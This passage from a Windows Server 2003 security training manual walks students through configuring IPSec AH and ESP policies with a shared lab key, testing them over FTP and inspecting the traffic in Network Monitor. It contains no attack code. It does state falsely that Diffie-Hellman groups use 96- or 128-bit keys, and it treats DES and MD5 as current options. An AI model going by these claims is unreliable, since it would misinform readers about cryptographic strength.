2. When you are asked if you wish to save the console settings, click Yes.
3. Save the le to the desktop as ipsec.mmc.msc
4. Verify the new addition by double-clicking the new ipsec.mmc.msc le
on the desktop. Your saved MMC opens just as you had customized it to do
so.
The Secure Server (Require Security) Policy
In the following sections, you will examine the settings of each of the three pre-
dened policies. The most secure policy, Secure Server (Require Security), is the
policy that states that all communication must be secured, with no exceptions.
The General Tab
As the name implies, the General tab provides general information and congura-
tion options for the Secure Server (Require Security) policy.
Lesson 6: Implementing IPSec and VPNs 307
Figure 6-2 shows the settings for Key Exchange. Keys are used as part of the
different forms of encryption that can be implemented in the IPSec policy. IKE
stands for Internet Key Exchange, and deals with the method of exchanging the
cryptographic key(s). SHA1 and MD5 are both algorithms that are used to verify
the integrity of a message. 3DES and DES are the actual encryption algorithms
that can be used, and nally, Diffie-Hellman Group will dictate the overall
strength of the encryption.
Figure 6-2: The Key Exchange Security Methods dialog box.
These settings work together to determine the integrity, condentiality, and
strength of the secured communication.
Integrity is determined by the SHA1 or MD5 algorithm.
Condentiality is determined by the 3DES or DES algorithm.
Strength is determined by the Diffie-Hellman Group, which can be either
96-bit (the low setting) or 128-bit (the high setting) key lengths.
TASK 6B-4
Examining Security Methods
Setup: You are logged on to Windows 2003 Server as Administrator,
and the ipsec.mmc.msc console is open.
1. In the right pane, right-click Secure Server (Require Security), and
choose Properties.
2. Select the General tab.
3. Observe that the default value for Check For Policy Changes Every is 180
minutes. Every 3 hours, the machine (if it is a domain member) will check
with Windows Active Directory to see if this policy, when assigned, has
changed.
DES:
(Data Encryption Standard)
Denition 1: An unclassied
crypto algorithm adopted by
the National Bureau of
Standards for public use.
Denition 2: A cryptographic
algorithm for the protection
of unclassied data,
published in Federal
Information Processing
Standard (FIPS) 46. The
DES, which was approved by
the National Institute of
Standards and Technology
(NIST), is intended for public
and government use.
308 Tactical Perimeter Defense
4. Under Perform Key Exchange Using Additional Settings, click Settings.
5. In the Key Exchange Settings dialog box, click Methods.
6. Examine the default settings for the security used in Secure Server
(Require Security).
7. Close all windows without changing the properties.
The Rules Tab for the Secure Server (Require Security)
Policy
The Rules section of an IPSec policyin this case, the Secure Server (Require
Security) policycontains the actual security sections of the policy pertaining to
traffic and actions. The IP Filter List is used to dene the types of network traffic
that are to be affected by this policy. The predened rules in a policy can be
modied, but cannot be removed. The default rules are for All IP Traffic, All
ICMP Traffic, and <Dynamic>.
In addition to the IP Filter List is the Filter Action. In other words, what does the
system do when a match to the rule is found, such as IP Traffic. There are three
actions, which are listed as:
Permit: Allow unsecured IP packets to pass.
Require Security: Requires secured communication.
Default Response: Follow the negotiations as initiated by the other computer.
This is especially useful when no other rule applies. In fact, it is the only
lter action for the Client (Respond Only) predened policy.
Lesson 6: Implementing IPSec and VPNs 309
Figure 6-3: The default lter lists and lter actions, as shown on the Require Security Rules
tab.
In addition to the IP Filter List and the Filter Actions on the Rules tab shown in
Figure 6-3, there are other sections that deserve noting. These are the Authentica-
tion, Tunnel Setting, and Connection Type options, described in the following
section and shown in Figure 6-4.
The Authentication Methods are used to dene how a trust will be estab-
lished between the two communicating hosts. By default, this is the
310 Tactical Perimeter Defense
Kerberos method. The other valid options (in addition to Kerberos) are to
use a certicate from a Certicate Authority (CA), or to use a predened
shared key string.
The Tunnel Setting is used to dene if this communication is to use a tunnel,
and if so, what the IP address for the end of the tunnel is. The endpoint is
the tunnel computer that is closest to the IP traffic destination.
The Connection Type is used to dene the types of connections to which the
rule will apply. For example, the default setting is All Network Connections.
The second option is to have the rule apply only to Local Area Network
(LAN) traffic, and the third option is to have the rule only apply to Remote
Access traffic.
Figure 6-4: The authentication methods, tunnel settings, and connection types, as shown on
the Require Security Rules tab.
TASK 6B-5
Examining Policy Rules
Setup: You are logged on to Windows 2003 Server as Administrator.
1. Reopen the ipsec.mmc.msc console.
2. In the right pane, right-click Secure Server (Require Security), and
choose Properties.
3. If necessary, select the Rules tab.
LAN:
(Local Area Network) A
computer communication
system limited to no more
than a few miles and using
high-speed connections (2 to
100 megabits per second). A
short-haul communication
system that connects ADP
devices in a building or
group of buildings within a
few square kilometers,
including workstations, front-
end processors, controllers,
and servers.
Lesson 6: Implementing IPSec and VPNs 311
4. Examine the default settings for IP Filter List, Filter Action, Authentica-
tion Methods, Tunnel Setting, and Connection Type.
5. Select the All IP Traffic rule, and click the Edit button.
6. Observe the conguration options that can be adjusted in this section.
7. When you are done reviewing the conguration options, click Cancel to
close the Secure Server Properties, without making changes.
8. Close the ipsec.mmc.msc console without saving changes.
Topic 6C
IPSec AH Implementation
You now have all of the information and tools you need to be able to implement
IPSec. Lets try it out.
About the Tasks
For the following tasks, you will work in pairs. The text and activities refer to the
two machines as Student_P and Student_Q.
Student_P will initiate communication with Student_Q. Student_Q will dictate
whether it has an IPSec policy enabled. If so, it then determines if it should
request or require Student_P to do the same. On Student_P, at rst you will have
no IPSec Respond policy activated, but later you will have a Respond policy. You
will capture traffic between these two computers using Network Monitor, and per-
form an analysis on the traffic.
You will also use the options for conguring policies. You will use just the AH
protocol (authenticity/integrity). Then, you will use just the ESP protocol
(condentiality). Following that, you will use AH with ESP. Also, ESP will be
congured to use its integrity algorithm. Finally, because the integrity algorithms
can be implemented in two avors (SHA-1 or MD5) and the encryption algo-
rithms for condentiality can also be implemented in two avors (DES or 3DES),
youll use combinations of these.
As a policy maker for a company, youll have to make such decisions before you
implement IPSec. These are the actual tools you can use in Windows 2003 to
implement your policies.
Creating Custom IPSec Policies
In the previous topic, you examined the default IPSec policies in Windows 2003.
For the remainder of the lesson, you will create and use your own customized
IPSec policies. This will enable you to fully create and secure network traffic
based on your unique conguration requirements. The following gures can be
used as a reference while performing the tasks of this section.
312 Tactical Perimeter Defense
Figure 6-5: Opting not to use the Add Wizard.
When you are creating a new policy, you will need to add and congure all the
options you previously examined. In these tasks, you will be customizing the
policies, one by one, and do not want to use the Add Wizard, because the Add
Wizard will walk you through specic predened steps. At this stage, you want to
perform everything manually.
Lesson 6: Implementing IPSec and VPNs 313
Figure 6-6: The Security Methods tab, showing the leftmost part of the Security Method
Preference Order.
During policy creation, you will be presented with the Security Methods tab. At
this stage, you will see ve columns presented: Type, AH Integrity, ESP Con-
dentiality, ESP Integrity, and Key Lifetimes (KB/Sec), but you might need to
scroll to see all ve.
314 Tactical Perimeter Defense
Figure 6-7: The Security Methods tab, showing the right-most part of the Security Method
Preference Order.
Security methods are listed in order of preference that this machine will use when
attempting to negotiate IP Security when dealing with another machine that
responds that it can use IPSec, too. You can add, edit, or remove any of these
methods. In this case, since you will have named this policy 1_REQUEST_
AH(md5)_only, you will simplify the list and offer exactly one choice: Request IP
Security that relies only on AH Integrity using the MD5 hashing algorithm. Do
not worry about key lifetimes at this stage.
TASK 6C-1
Creating the 1_REQUEST_AH(md5)_only Policy
Note: Perform this task only if you are designated as Student_Q.
1. Open the ipsec.mmc.msc console.
2. In the right pane, right-click and choose Create IP Security Policy, then
click Next.
3. For the IP Security Policy Name, type 1_REQUEST_AH(md5)_only and
click Next.
4. Uncheck Activate The Default Response Rule and click Next.
5. Uncheck Edit Properties and click Finish.
Lesson 6: Implementing IPSec and VPNs 315
6. Double-click the new policy 1_REQUEST_AH(md5)_only.
7. On the Rules tab, uncheck Use Add Wizard and click Add.
8. On the IP Filter List tab, click the radio button for All IP Traffic.
9. Switch to the Filter Action tab.
10. Click the radio button for Request Security (Optional).
11. Click Edit.
12. Verify that the radio button for Negotiate Security is selected.
13. Read the options presented to you under Security Method Preference
Order.
14. Remove all but one Security Method by holding down the Shift key,
selecting all but one of the choices, and clicking Remove. You can leave
any one of the Security Methods.
15. When prompted with Are You Sure?, click Yes.
16. Select the remaining method, and click Edit.
17. Under Security Method, click the Settings button found under Custom (For
Expert Users)as youre on your way to becoming an expert on IPSec.
18. Verify that AH is checked and that the integrity algorithm is MD5.
19. If necessary, uncheck ESP.
20. Under Session Key Settings, uncheck both check boxes.
316 Tactical Perimeter Defense
21. Click OK three times to return to the New Rule Properties dialog box.
22. Leave the New Rule Properties open for the next task.
Editing Authentication Method Policies
When you are creating this customized policy, you are going to use only AH, and
not ESP. So, when you are customizing the settings, be sure to uncheck the ESP
options and to check the AH options. You should also clear the check boxes for
generating new keys, both for size (Kbytes) and time (seconds).
Figure 6-8: The Authentication Method tab.
Notice that three authentication methods are supported: Kerberos, Certicates, and
Preshared Keys. You will use the third method, as it is simple to implement, for
now. In a production environment, if you have a homogenous Windows 2003
domain implementation, you could leave it at the default Kerberos; in a heteroge-
neous network, you could choose to set up a CA and distribute IPSec certicates.
Lesson 6: Implementing IPSec and VPNs 317
TASK 6C-2
Editing the 1_REQUEST_AH(md5)_only Policy
Note: Perform this task only if you are designated as Student_Q.
1. Verify that the New Rule Properties are displayed.
2. Select the Authentication Methods tab.
3. Click Edit.
4. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide text for
the preshared key.
Click OK to close the Edit Authentication Methods Properties dialog box.
5. Switch to the Tunnel Setting tab, but leave the settings alone. You will be
working in Transport Mode only.
6. Switch to the Connection Type tab, but leave the settings alone. You will
use the default of All Network Connections.
7. Click Close to close the Rule Properties. Keep the Policy Properties open
for the next task.
Setting Up the Computers Response
You have just congured a policy where Student_Q will request any other com-
puters that attempt to communicate with it to implement AH by using the MD5
algorithm. Lets assume that this policy is put into effect, and another computer
says that it can communicate with Student_Q by using AH, as well. Student_Q
should be in a position to respond to this. Therefore, you should now congure
the Default Response rule in this policy for Student_Q.
318 Tactical Perimeter Defense
Figure 6-9: Preparing to modify the default response.
To modify the rule, you will not use the Add Wizard. Once you click Edit, you
will again be presented with the tabs for Security Methods, Authentication Meth-
ods, and Connection Types.
Figure 6-10: Editing security methods.
Lesson 6: Implementing IPSec and VPNs 319
Under Security Methods, you will again see ve columns presented: Type, AH
Integrity, ESP Condentiality, ESP Integrity, and Key Lifetimes (KB/Sec). As
before, you can add, edit, or remove any of these methods.
In this case, this policy is named 1_REQUEST_AH(md5)_only, but because it will
also have to respond to the request it made, youll simplify the list and offer
exactly one choice: Respond to IP Security that relies only on AH integrity using
the MD5 hashing algorithm. As before, you dont need to worry about the key
lifetimes.
TASK 6C-3
Configuring the Policy Response
Note: Perform this task only if you are designated as Student_Q.
1. Verify that the properties for the 1_REQUEST_AH(md5)_only policy
are displayed.
2. On the Rules tab, check <Dynamic> Default Response, and click Edit.
(The Use Add Wizard check box should remain unchecked.)
3. Remove all but one Security Method by holding down the Shift key,
selecting all but one of the choices, and clicking Remove.
4. When prompted with Are You Sure?, click Yes.
5. Select the remaining method, and click Edit.
6. Under Security Method, click the Settings button found under Custom.
7. Verify that the box beside AH is checked and that the integrity algo-
rithm is MD5.
8. Verify that ESP is unchecked.
9. Under Session Key Settings, verify that the options for generating new
keys for both size and time are unchecked.
10. Click OK twice to return to the Edit Rule Properties.
11. Switch to the Authentication Methods tab.
12. Click Edit.
13. Click the Use This String To Protect The Key Exchange (Preshared Key)
radio button, and in the box, type Purple Enigma to provide the text for
the preshared key.
14. Click OK twice to return to the policy properties.
15. Double-click All IP Traffic.
16. Switch to the Connection Type tab and verify that the setting is the
default of All Network Connections.
320 Tactical Perimeter Defense
17. Click OK, and then click OK to close.
18. Close the ipsec.mmc.msc console without saving changes.
Configuring AH in Both Directions
You have congured a policy where Student_Q will request other computers that
attempt to communicate with it to implement AH by using the MD5 algorithm;
Student_Q is also in a position to respond by using this algorithm. Now, lets
congure Student_P to follow Student_Qs lead.
TASK 6C-4
Configuring the Second Computer
Note: Perform this task only if you are designated as Student_P.
1. Open the ipsec.mmc.msc console. In the right pane, right-click and choose
Create IP Security Policy. Click Next.
2. For the IP Security Policy Name, type 1_RESPOND_AH(md5)_only and
click Next.
3. Uncheck Activate The Default Response Rule and click Next.
4. Uncheck Edit Properties and click Finish.
5. Double-click the new policy 1_RESPOND_AH(md5)_only.
6. On the Rules tab, uncheck Use Add Wizard, check <Dynamic> Default
Response, and click Edit.
7. Remove all choices but one by holding down the Shift key, selecting all
but one of the choices, and clicking Remove.
8. When prompted with Are You Sure?, click Yes.
9. Select the remaining method and click Edit.
10. Under Security Method, click the Settings button found under Custom
(For Expert Users).
11. Verify that AH is checked and that the integrity algorithm is MD5.
12. Verify that ESP is unchecked.
13. Under Session Key Settings, verify that the boxes for generating new keys
for both time and size are unchecked.
14. Click OK twice to return to the Rule Properties.
15. Switch to the Authentication Methods tab.
Lesson 6: Implementing IPSec and VPNs 321
16. Click Edit.
17. Click the Use This String To Protect The Key Exchange (Preshared Key)
radio button, and in the box, type Purple Enigma to provide the text for
the preshared key.
18. Click OK.
19. Click OK twice, and then click Close to nish the creation of the policy.
20. Close the ipsec.mmc.msc console without saving changes.
Configuring FTP
Now that IPSec policies are congured on two machines, you need to test the
policies to ensure that they work as you intended them to work. To do this, youll
bring up an FTP site on Student_Q and attempt to access this FTP site from
Student_P. Youll do this with IPSec implemented on one machine and then on
the other. Youll run Network Monitor to capture and record traffic between the
two machines. Youll examine these captures and see where (in the packet) the
IPSec headers reside. For greater clarity, we can verify this with the RFCs associ-
ated with IPSec, as well.
TASK 6C-5
Setting Up the FTP Process
Note: Perform step 1 through step 17 only if you are designated as Student_Q.
1. Choose StartControl PanelAdd Or Remove Programs.
2. Click the Add/Remove Windows Components button.
3. Click Application Server, and click the Details button.
4. Check the Internet Information Services (IIS) check box. Note, that when
you select this option, COM+ is selected by default.
5. With IIS selected, click the Details button.
6. Check the File Transfer Protocol (FTP) Service check box and click OK.
Click OK again to return to the Windows Components screen.
7. Click Next. You may be prompted for your Windows Server 2003
CD-ROM.
8. Once the installation is complete, click Finish.
9. Close the Add Or Remove Programs window.
10. Choose StartAdministrative ToolsInternet Information Services
Manager.
322 Tactical Perimeter Defense
11. In the left pane expand your Server name.
12. Expand FTP Sites, right-click Default FTP Site, and choose Properties.
13. Click the Home Directory tab and verify the location of the FTP folder.
The default location is C:\Inetpub\ftproot.
14. Close the IIS Manager.
15. In Explorer, locate and navigate to the folder designated as the FTP
home directory.
16. In this folder, create a text document. Edit this document to input some
text and save it as text1.txt
17. Create and save three more similar text documents in the same folder.
Use text2.txt, text3.txt, and text4.txt as the le names.
Note: Perform step 18 through step 23 only if you are designated as Student_P.
18. Open a command prompt.
19. Enter ftp IP_address_of_Student_Q to ftp to Student_Qs FTP
site.
20. Log on as anonymous with no password.
21. Verify that you can access the text documents created on the Student_Q
computer by using the DIR command.
22. Once you have veried that you can access the text documents, quit the ftp
session by entering bye at the ftp prompt.
23. Leave this command prompt open.
Implementing the IPSec Policy
You have just tested a plain text ftp session. The following tasks will walk you
through the process of implementing IPSec, and testing the results in both
directions. First, you will prove that you can connect, even though IPSec is
implemented on only one of the hosts.
Lesson 6: Implementing IPSec and VPNs 323
TASK 6C-6
Implementing the 1_REQUEST_AH(md5)_only Policy
Note: Perform step 1 through step 4 only if you are designated as Student_Q.
1. Open your ipsec.mmc.msc console. Right-click the 1_REQUEST_
AH(md5)_only policy and choose Assign.
2. Close the ipsec.mmc.msc console. If you are prompted to save changes,
click No.
3. Start Network Monitor, and verify that it is going to collect packets
from the interface connected to Student_P.
4. Start a new capture, and allow Network Monitor to capture packets
until Student_P has completed step 5 through step 9.
Note: Perform step 5 through step 9 only if you are designated as Student_P.
5. At the command prompt, again enter ftp
IP_address_of_Student_Q
You should be able to successfully ftp to Student_Q after a very brief delay,
even though an IPSec policy is assigned on Student_Q.
6. Log on as anonymous with no password.
7. Enter dir to see a list of les hosted on the ftp site.
8. Exit the ftp session.
9. Leave the command prompt open.
Request-only Session Analysis
Why was your attempt successful? What is the reason for the brief delay? This is
because the policy is designed to request onlynot demandIPSec. If the
remote machine trying to communicate with Student_Q is not IPSec-aware or
does not have a policy assigned to do so, then Student_Q will fall back to regu-
lar, insecure IP. The brief delay occurred because Student_Q was trying to
establish an IPSec communication with Student_P.
You will be using Network
Monitor repeatedly
throughout this course, so
you might want to create a
shortcut for it on the
Windows desktop.
324 Tactical Perimeter Defense
TASK 6C-7
Analyzing the Request-only Session
Note: Perform this task only if you are designated as Student_Q.
1. In Network Monitor, stop and view the capture.
2. Observe that, after the ARP resolution has taken place (in frames 1 and 2),
Student_P attempts to initiate a three-way handshake with Student_Q (in
frame 3). Because the policy on Student_Q says to request IPSec communi-
cation, Student_Q begins the negotiation process (in frame 4).
3. In frame 4, observe that the protocol is ISAKMP (UDP port 500). When it
does not hear from Student_P, it tries again approximately a second later.
When it does not hear from Student_P again, it falls back to insecure com-
munication, and the three-way handshake proceeds as before (in frames 6, 7,
and 8). Once the connection is made, the session is established in clear text,
with no IPSec. You are able to see the payload and full headers of all the
packets, with no evidence of IPSec.
4. Close Network Monitor. You can save your capture to a le, if you like.
Implementing a Request-and-Respond Policy
In the previous task, you saw that even though you had IPSec enabled in one
direction, the policy allowed for unsecured communication. When Student_P
responded with no IPSec, Student_Q went ahead and accepted the session, and
traffic continued without IPSec. In the next task, you will congure Student_P to
respond to Student_Qs IPSec policy.
TASK 6C-8
Configuring a Request-and-Respond IPSec Session
Note: Perform step 1 only if you are designated as Student_P.
1. Open your ipsec.mmc.msc console. Right-click 1_RESPOND_AH(md5)_
only policy, and choose Assign. Close the ipsec.mmc.msc console, without
saving changes.
Then, wait until Student_Q performs the next step.
Note: Perform step 2 only if you are designated as Student_Q.
2. Activate Network Monitor, and start a capture.
Note: Perform the rest of this task only if you are designated as Student_P.
Based on your network
trafc, you might have
different Frame numbers in
your packet captures.
For this step, and
subsequent steps that deal
with the ISAKMP protocol,
your classroom
conguration might not
yield the expected results,
due to timing issues as the
students complete their
assigned steps. You can
have them try to restart the
computer, and then try
redoing the activity.
Lesson 6: Implementing IPSec and VPNs 325
3. At the command prompt, again enter ftp
IP_address_of_Student_Q
You should be able to successfully ftp to Student_Q.
4. Log on as anonymous with no password.
5. Enter dir to see a list of les hosted on the ftp site.
6. Exit the ftp session.
7. Close the command prompt.
Request-and-Respond Session Analysis
In the second attempt at communication, the temporary delay that was visible in
the earlier task was not present. This is because the second host was now able to
respond to the IPSec request initiated by the ftp server. There was no need to
move down the list to a different method of communication, therefore, saving a
bit of time. In the following task, you will use Network Monitor to analyze this
session, and to see how the IPSec policy was implemented.
Some things to look for during this analysis include:
IP identies AH with a protocol ID of 0x33 (51).
AH identies TCP with a Next Header of 0x6 (6).
TCP identies FTP with a destination port of 0x15 (21).
TASK 6C-9
Analyzing the Request-and-Respond Session
Note: Perform this task only if you are designated as Student_Q. Student_P is
advised to follow along.
1. In Network Monitor, stop and view the capture.
2. Observe that, after the ARP resolution has taken place (in frames 1 and 2),
Student_P attempts to initiate a three-way handshake with Student_Q (in
frame 3).
3. Observe that, because the policy on Student_Q says to request IPSec com-
munication, Student_Q begins the negotiation process (in frame 4) by using
the ISAKMP protocol (UDP port 500).
4. Observe that, when Student_P agrees to comply with the IPSec request (in
frame 5), there is an ISAKMP interplay between the two machines for the
next few frames to negotiate and establish the IPSec protocol.
5. Observe that the actual three-way handshake is now completed in frames 14
and 15. If your network traffic is different, your frame numbers will be
different.
Based on your network
trafc, you might have
different Frame numbers in
your packet captures.
ARP and ISAKMP may be
different on your system.
326 Tactical Perimeter Defense
6. Observe that, from frame 16 onward until the session teardown, the AH
ensures integrity of communication between the two machines.
7. Double-click a frame whose protocol is identied by Network Monitor as
FTP.
8. Observe the sequence of protocol identication: Ethernet, then IP, then AH,
then TCP, then FTP. As noted earlier:
Ethernet identies the protocol IP with an Ethertype of 0x800.
IP identies AH with a protocol ID of 0x33 (51).
AH identies TCP with a Next Header of 0x6 (6).
TCP identies FTP with a destination port of 0x15 (21).
9. Observe that there is no encryptionthe AH only signs the packet; it does
not encrypt it.
10. In fact, look around frame 33. Near there, you should be able to see the
name of the text le in response to the dir (LIST) command.
11. Close Network Monitor. You can save your capture to a le if you like.
Topic 6D
Combining AH and ESP in IPSec
In the previous topic, you examined the implementation of AH in Windows
Server 2003, including viewing packet data in Network Monitor. In older sys-
tems, such as Windows 2000, you could create IPSec policies that were ESP only,
but these are no longer an option. The ESP implementation in Windows Server
2003 now requires the use of the Authentication Header. In the following section
of tasks, you will enable different options in the establishment of IPSec between
two computers.
You have congured and analyzed IPSec traffic by using AH, and IPSec traffic by
using ESP. In this topic, you will congure and analyze network traffic that com-
bines AH and ESP. When you are using both AH and ESP, you are conguring
IPSec to its fullest strength.
TASK 6D-1
Creating the 5_REQUEST_AH(md5)+ESP(des) IPSec
Policy and the Response Policy
Note: Perform this task only if you are designated as Student_Q. Student_P is
advised to follow along.
1. Open your ipsec.mmc.msc console. In the right pane, unassign the cur-
rent policy, and then create another IP Security Policy. Click Next.
Lesson 6: Implementing IPSec and VPNs 327
2. For the IP Security Policy Name, type 5_REQUEST_AH(md5)+ESP(des)
and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, and click
Add.
7. On the IP Filter List tab, select the All IP Traffic radio button.
8. Switch to the Filter Action tab.
9. Select the Request Security (Optional) radio button.
10. Click Edit.
11. Leave the radio button selected for Negotiate Security.
12. Read the options presented to you under Security Method Preference
Order.
13. Remove all but one method by holding the Shift key, selecting all but
one of the choices, and clicking Remove. Some congurations might have
only one option. If so, skip the next step.
14. When prompted with Are You Sure?, click Yes.
15. Select the remaining method, and click Edit.
16. Under Security Method, click the Settings button found under Custom.
17. Verify that AH is checked.
18. Select the integrity algorithm MD5.
19. Verify that ESP is checked.
20. Leave ESPs integrity algorithm set to <None>.
21. For Encryption Algorithm, select DES.
22. Under the Session Key settings, verify that the two boxes for generating
new keys for both time and size are unchecked.
23. Click OK three times to return to the Rule Properties.
24. Switch to the Authentication Methods tab.
25. Click Edit.
26. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide the text
for the preshared key.
328 Tactical Perimeter Defense
27. Click OK, and then click Close to return to the Policy Properties.
28. On the Rules tab, check <Dynamic> Default Response, and click Edit.
The Use Add Wizard check box should remain unchecked.
29. Under Security Methods, hold the Shift key, select all but one of the
choices, and click Remove.
30. Select the remaining method, and click Edit.
31. Under Security Method, click the Settings button found under Custom.
32. Verify that AH is checked.
33. Select the integrity algorithm MD5.
34. Verify that ESP is checked.
35. Leave ESPs integrity algorithm set to <None>.
36. For Encryption Algorithm, select DES.
37. Under the Session Key settings, verify that the two boxes for generating
new keys for both time and size are unchecked.
38. Click OK twice to return to the Rule Properties.
39. Switch to the Authentication Methods tab.
40. Click Edit.
41. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide the text
for the preshared key.
42. Click OK three times to close the Policy Properties.
43. Close the console without saving settings.
Configuring the IPSec Response
You have congured a policy where Student_Q will request other computers that
attempt to communicate with it to implement AH by using the MD5 integrity
algorithm and ESP by using the DES encryption algorithm; Student_Q is also in
a position to respond by using this algorithm. Lets congure Student_P to follow
Student_Qs lead.
Lesson 6: Implementing IPSec and VPNs 329
TASK 6D-2
Creating the 5_RESPOND_AH(md5)+ESP(des) IPSec
Policy
Note: Perform this task only if you are designated as Student_P. Student_Q is
advised to follow along.
1. Open your ipsec.mmc.msc console. In the right pane, create another IP
Security Policy. Click Next.
2. For the IP Security Policy Name, type 5_RESPOND_AH(md5)+ESP(des)
and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, check
<Dynamic> Default Response, and click Edit.
7. Remove all but one security method by holding the Shift key, selecting
all but one of the choices, and clicking Remove.
8. When prompted with Are You Sure?, click Yes.
9. Select the remaining method, and click Edit.
10. Under Security Method, click the Settings button found under Custom.
11. Verify that AH is checked.
12. Select the integrity algorithm MD5.
13. Verify that ESP is checked.
14. Leave ESPs integrity algorithm set to <None>.
15. For Encryption Algorithm, select DES.
16. Under the Session Key settings, verify that the two boxes for generating
new keys for both time and size are unchecked.
17. Click OK twice to return to the Rule Properties.
18. Switch to the Authentication Methods tab.
19. Click Edit.
20. Select the Use This String To Protect The Key Exchange (Preshared
Key) radio button, and in the box, type Purple Enigma to provide the text
for the preshared key.
330 Tactical Perimeter Defense
21. Click OK three times to close the Policy Properties.
22. Close the console without saving settings.
AH and ESP IPSec Session Analysis
You have just gone through the steps of conguring IPSec on both Student_P and
Student_Q. In the next task, you will initiate a communication between the two
hosts, and analyze the communication in Network Monitor.
The initial communication will be an attempt at using FTP. As with the
1_REQUEST_AH(md5)_only policy, this transaction is also successful between
Student_P and Student_Q because Student_Qs policy is designed to requestnot
demandIPSec. If a remote machine trying to communicate with Student_Q is
not IPSec-aware or does not have a policy assigned to do so, then Student_Q will
fall back to regular, insecure IP. The brief delay occurs because Student_Q is try-
ing to establish an IPSec communication with Student_P. Once the connection is
made, the second computer will be congured to respond to the rst properly.
During the session analysis, try to note the differences from the earlier captures
those resulting from the AH_only policy. Here, you are not able to see any of the
TCP ags, connection setup, three-way handshake completion, or data
transferin fact, you will see nothing but encrypted stuff! The protocol is listed
simply as ESP. If you check the details within the IP header, IP points to AHIP
protocol ID 51 (0x33) and AH points to ESPIP protocol ID 50 (0x32). After
the IP header is AH/ESP. No one but these two endpoints can decrypt packets
destined for them.
TASK 6D-3
Configuring and Analyzing an IPSec Session Using AH
and ESP
Note: Perform step 1 through step 2 only if you are designated as Student_Q.
1. Open your ipsec.mmc.msc console. Right-click the 5_REQUEST_
AH(md5)+ESP(des) policy and choose Assign. Close the console.
2. Start Network Monitor, and start a capture.
Note: Perform step 3 through step 8 only if you are designated as Student_P.
3. At the command prompt, again enter ftp
IP_address_of_Student_Q
You should be able to successfully ftp to Student_Q after a very brief delay,
even though an IPSec policy is assigned on Student_Q.
4. Log on as anonymous with no password.
5. Enter dir to see a list of les hosted on the ftp site.
6. Exit the ftp session.
As you assign and unassign
policies, you might need to
issue the command:
gpupdate /force to initialize
those policies right away.
Lesson 6: Implementing IPSec and VPNs 331
7. Open your ipsec.mmc.msc console. Right-click the 5_RESPOND_
AH(md5)+ESP(des) policy, and choose Assign.
8. Open a command prompt and enter the following command
gpupdate /force (this will ensure that your newly assigned policy will
start right away).
Note: Perform step 9 through step 11 only if you are designated as Student_Q.
9. In Network Monitor, stop and view the capture.
10. Observe the session between the two hosts. Note that encryption is not used
and that commands are visible in clear text.
11. Start a new capture (save the previous capture if you like).
Note: Perform step 12 through step 15 on Student_P.
12. At the command prompt, again enter ftp
IP_address_of_Student_Q
You should be able to successfully ftp to Student_Q.
13. Log on as anonymous with no password.
14. Enter dir to see a list of les hosted on the ftp site.
15. Exit the ftp session.
Note: Perform step 16 through step 19 only if you are designated as Student_Q.
16. In Network Monitor, stop and view the capture.
17. Search the packets, and try to look for the name of the text le in
response to the dir (LIST) command.
18. Observe that AH ensures integrity and ESP ensures condentiality of com-
munication between the two machines.
19. Close Network Monitor. You can save your capture to a le if you like.
Note: Perform the following step only if you are designated as Student_P.
20. Open your ipsec.mmc.msc console, unassign the 5_RESPOND_
AH(md5)+ESP(des) policy, and close the console.
332 Tactical Perimeter Defense
Configuring All the Options
Now, lets step up the requirements for IPSec. Lets say you were paranoid and
wanted to use all the features set to their highest security settings. You will con-
gure an IPSec policy on Student_Q that will use the SHA-1 algorithm to ensure
integrity and 3DES to ensure condentiality. You will then congure Student_Q
to demand IPSec of other computers. To do so, you will use a Require policy
instead of a Request policy. Finally, on Student_P, you will implement a corre-
sponding Respond policy and establish communications with Student_Q.
Someone may bring up the question, Hey, why would you use the integrity algo-
rithm twice? At this point, well leave the answer as a smug Because we can!
Actually, there is a more simplied explanation.
Most books on IPSec recommend using AH to ensure the integrity of the entire
packet and ESP just for condentiality of the payload. Most books on IPSec also
simply say that ESP ...can also be used for integrity. Lets look at this a little
more carefully.
The AHs function is to sign the entire packet, including the IP header. However,
there are certain elds in the IP header that have to be excluded because they are
designed to change. One example of this is when traversing a routed environ-
ment, the 8-bit TTL eld will decrement by 1 at each hop. The values contained
within these elds cannot be signed, as the received value would not match the
value at origin.
The ESPs function is to encrypt and/or sign everything but the IP header. In
Transport Mode, using ESPs signing functionality might be considered redundant
when AH is around to do the job, especially when AH can sign even the IP head-
ers (mostly).
Its when IPSec is implemented in Tunnel Mode, as with a VPN solution, that
ESPs signing functionality has some meaning over and above that of AH. In
Tunnel Mode, there are two IP headers in each packet. The outer IP header is the
one used by the tunnel endpoints to communicate with each other. Encapsulated
within this as payload data is the IP header, IP protocol, and the actual data of the
two hosts communicating end-to-end via the tunnel. Therefore, when the tunnel
endpoints use ESPs integrity algorithm, the internal IP headers are treated as data
and will be completely signed.
By the way, before you get carried away with IPSec, it is also recommend that
you read Bruce Schneiers excellent critique on IPSec. You can nd it at his com-
panys website, www.counterpane.com.
TASK 6D-4
Implementing the 7_REQUIRE_
AH(sha)+ESP(sha+3des) Policy
Note: Perform this task only if you are designated as Student_Q. Student_P is
advised to follow along.
1. Create another IP Security Policy. Click Next.
Lesson 6: Implementing IPSec and VPNs 333
2. For the IP Security Policy Name, type 7_REQUIRE_
AH(sha)+ESP(sha+3des) and click Next.
3. Uncheck Activate The Default Response Rule, and click Next.
4. Uncheck Edit Properties, and click Finish.
5. Double-click the new policy.
6. On the Rules tab, verify that Use Add Wizard is unchecked, and click
Add.
7. On the IP Filter List tab, select the All IP Traffic radio button.
8. Switch to the Filter Action tab.
9. Select the Require Security radio button.
10. Click Edit.
11. Leave the radio button selected for Negotiate Security.
12. If necessary, remove all but one security method.
13. Select the remaining method, and click Edit.
14. Under Security Method, click the Settings button found under Custom.
15. Verify that AH is checked.
16. Select the integrity algorithm as SHA1.
17. Verify that ESP is checked.
18. Select ESPs integrity algorithm as SHA1.
19. For Encryption Algorithm, select 3DES.
